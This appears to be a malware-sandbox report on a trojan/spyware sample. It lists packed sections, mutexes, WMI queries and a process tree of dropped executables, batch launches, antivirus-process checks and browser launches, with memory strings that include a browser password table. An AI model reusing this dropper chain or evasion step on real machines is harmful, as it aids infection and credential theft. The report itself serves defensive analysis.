Source: ba77748b9b.exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: random[1].exe.0.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: enter[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: enter[1].exe.0.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: axplong.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: axplong.exe.5.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: explorti.exe.8.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: explorti.exe.8.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@100/171@31/20

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C737030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\CFKWDMI0.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3144
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess616

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\1000003002\ead6a72944.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2115692491.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2116022880.0000000002797000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2095025056.0000000022C69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: RoamingBKKFHIEGDH.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingAEGIJKEHCA.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1040
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
